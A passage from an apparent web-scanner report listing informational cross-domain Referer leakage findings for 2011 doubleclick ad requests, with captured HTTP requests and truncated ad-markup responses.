The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114.5;sz=300x250;click=http://a.tribalfusion.com/h.click/aomOvJT6rp3GQY0bQZaTPip5AQdQmbE4WBt0tZbLpdEM3PQT5cj8Tsn7WcfiPAFwTtY4UFjP3bapUEnnTTQcPqnLRcJIQrZavPW3iVcbU4FXxmtqtYaaM4dUGQcrF26QJmdAoUdBbYFfdYUZbh1EisRrJZdTU3XWtMTnb7oPbrNUtYHd5DTOn/;ord=1267541176?

The response contains the following link to another domain:

http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif

Request

Response

15.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5387288.7

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q2/728/L41/1958421561/x90/USNetwork/RS_SELL_2011Q2_TF_GEN_728/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1958421561?

The response contains the following links to other domains:

http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=62126627&AR_C=42474885
http://s0.2mdn.net/2782903/HTC_Inspire_Red_728x90.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js
http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;62126627;239242795;42474885&migRandom=7939479&migTrackFmtExt=client;io;ad;crtv

Request

GET /adi/N3867.270604.B3/B5387288.7;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmOQKXWQAmW6x4mvQ5Vj9VVF8UVbiPPJwUHJVWrb55UZarWajnVEn9QTULQGQKQFAqPtniWVYQ5bipodisYaqy3HrDPcJZa463ImdayTHYb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBdkZcMwq/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q2/728/L41/1958421561/x90/USNetwork/RS_SELL_2011Q2_TF_GEN_728/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1958421561? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5282
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 14:08:57 GMT
Expires: Thu, 16 Jun 2011 14:08:57 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
;42474885&migRandom=7939479&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshackwireless.com/template/simpleautocontent.aspx?pageid=9844&r=radioshack&refcode1=RSK_0529_001_HPINSPIRERED"><img src="http://s0.2mdn.net/2782903/HTC_Inspire_Red_728x90.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript><img src="http://t.mookie1.com/t/v1/imp?%25&migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;62126627;239242795;42474885&migRandom=7939479&migTrackFmtExt=client;io;ad;crtv" width="0" height="0" border="0" /><script src="http://ar.voicefive.com/bmx3/broker.pli?pid=p85001580&PRAd=62126627&AR_C=42474885"></script>
...[SNIP]...

15.7. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.3

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498?

The response contains the following links to other domains:

http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847894&advid=2179194&sid=366614&adid=
http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript
http://s0.2mdn.net/2179194/13-HYSA_RL_300x250_20k.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N553.specificmedia.com/B4970757.3;sz=300x250;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=;ord=1308235498? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4749;c=124110;b=740428;ts=20110616104458
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6141
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 14:44:58 GMT
Expires: Thu, 16 Jun 2011 14:44:58 GMT
Discarded: true


<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4749%3Bc=124110%3Bb=740428%3Bts=1308235498%3Bdct=http://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/13-HYSA_RL_300x250_20k.jpg" width="300" height="250" border="0" alt="" galleryimg="no"></a></noscript>


<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847894&advid=2179194&sid=366614&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript"/></noscript>

15.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4748%3Bc=124110%3Bb=740422%3Bts=1308235188%3Bdct=;ord=1308235188?

The response contains the following links to other domains:

http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847895&advid=2179194&sid=366614&adid=
http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript
http://s0.2mdn.net/2179194/13-HYSA_RL_728x90_20k.jpg

Request

GET /adi/N553.specificmedia.com/B4970757.4;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4748%3Bc=124110%3Bb=740422%3Bts=1308235188%3Bdct=;ord=1308235188? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=4748;c=124110;b=740422;ts=20110616103947
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5810
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 14:39:47 GMT
Expires: Thu, 16 Jun 2011 14:39:47 GMT
Discarded: true



<SCRIPT LANGUAGE="JavaScript">
<!--
fu
...[SNIP]...
Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://clk.specificclick.net/click/v=5%3Bm=2%3Bl=4748%3Bc=124110%3Bb=740422%3Bts=1308235188%3Bdct=http://personalsavings.americanexpress.com/savings-product.html"><img src="http://s0.2mdn.net/2179194/13-HYSA_RL_728x90_20k.jpg" width="728" height="90" border="0" alt="" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script26.js?agnc=422775&cmp=4970757&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=57847895&advid=2179194&sid=366614&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1153/pixel.gif?e=100&v=noscript"/></noscript>

15.9. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.4

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978?

The response contains the following link to another domain:

http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/ba/%2a/e%3B242318863%3B0-0%3B0%3B65145569%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=1199171978?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145569&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318

Request

GET /adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 764
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 15:52:10 GMT
Expires: Thu, 16 Jun 2011 15:52:10 GMT
Discarded: true

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/ba/%2a/e%3B242318863%3B0-0%3B0%3B65145569%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=1199171978?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145569&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" allowTransparency="allowtransparency" marginWidth="0" scrolling="no" leftmargin="0" topmargin="0"></iframe>

15.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=108701616?

The response contains the following link to another domain:

http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=108701616?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=108701616? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308244184265&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 766
Date: Thu, 16 Jun 2011 17:09:45 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/108701616/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=108701616?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" allowTransparency="allowtransparency" marginWidth="0" scrolling="no" leftmargin="0" topmargin="0"></iframe>

15.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540?

The response contains the following link to another domain:

http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=473239540?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 766
Cache-Control: no-cache
Pragma: no-cache
Date: Thu, 16 Jun 2011 16:02:31 GMT
Expires: Thu, 16 Jun 2011 16:02:31 GMT
Discarded: true

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=473239540?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" allowTransparency="allowtransparency" marginWidth="0" scrolling="no" leftmargin="0" topmargin="0"></iframe>

15.12. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=215682172?

The response contains the following link to another domain:

http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=215682172?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=215682172? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308243871331&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 766
Date: Thu, 16 Jun 2011 17:04:32 GMT

<iframe width="728px" height="90px" marginHeight="0" src="http://dar.youknowbest.com/?afid=1304&re_click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/17/bd/%2a/h%3B242318863%3B0-0%3B0%3B65145576%3B3454-728/90%3B42541965/42559752/1%3B%3B%7Esscs%3D%3fhttp://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/215682172/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?&AD_CALL_ID=215682172?&AD_ID=&BEHAVIOR_SIGNAL_ID=&CHANNEL_ID=&LINE_ITEM_ID=&PUBLISHER_ID=&SITE_ID=&DFA_BuyId=5598690&DFA_PlacementId=65145576&DFA_AdId=242318863&DFA_CreativeId=42541965&DFA_SiteId=769318" frameBorder="0" allowTransparency="allowtransparency" marginWidth="0" scrolling="no" leftmargin="0" topmargin="0"></iframe>

15.13. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=2;tile=6;sz=170x67;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/1146650/MW_BBBrokerCenterBuySellHold_170x40.png

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=2;tile=6;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 895
Date: Thu, 16 Jun 2011 11:22:20 GMT

<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a href="http://ad.doubleclick.net/click%3Bh%3Dv8/3b28/3/0/%2a
...[SNIP]...
x67%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D6/1/ff/1%3B%7Esscs%3D%3fhttp://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_hamwbb_170x67" target="_new" style="text-decoration:none"><img src="http://s0.2mdn.net/1146650/MW_BBBrokerCenterBuySellHold_170x40.png" width="170" height="40" border="0" alt="advertisement" align="top"/><div style="font-family: Arial, Helvetica, Verdana, sans-serif;font-size: 11px;padding:0px 0px 0px 0px; solid #cfc7b7;">
...[SNIP]...

15.14. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144;

The response contains the following link to another domain:

http://s0.2mdn.net/1146650/MW_BBBrokerCenterTitle_170x40.png

Request

GET /adi/brokerbuttons.wsj.com/us_subscriber;;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;pos=1;tile=5;sz=170x67;ord=8144814481448144; HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 889
Date: Thu, 16 Jun 2011 11:22:21 GMT

